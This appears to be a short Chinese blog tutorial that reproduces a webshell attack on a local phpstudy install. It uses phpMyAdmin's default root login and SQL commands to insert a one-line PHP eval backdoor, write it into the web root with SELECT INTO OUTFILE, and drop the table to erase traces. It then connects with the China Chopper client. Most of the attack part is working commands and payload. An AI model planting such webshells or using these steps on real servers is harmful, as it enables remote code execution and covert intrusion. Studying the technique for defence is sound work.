探针过程获取sh"/>
复现phpstudy数据库探针过程获取sh
使用数据库将一句话发送到phpstudy本地进行连接原理。
1:安装并打开phpstudy,启动服务:
2:进入phpMyadmin数据库账户密码默认root,登录
3:选择或者创建一个数据库:
这里选择了test数据库,选择sql语句,执行以下命令:
create table ma (cmd text NOT NULL);//创建名为ma的表,不能为空
insert into ma (cmd) values ('<?php @eval($_POST[123])?>');//在ma表中插入一句话木马
select cmd from ma into outfile 'D:/phpstudy/WWW/a.php';//查找www目录,将一句话木马写入。
drop table if exists ma;//清楚痕迹。
选择执行命令:
4:这时我们的www目录下已经插入了名为a.php的目录:
4打开中国菜刀进行连接,在这里要注意php版本最好是5版本,7版本无法进行连接。:
连接成功。
更多推荐
复现phpstudy数据库探针过程获取sh
发布评论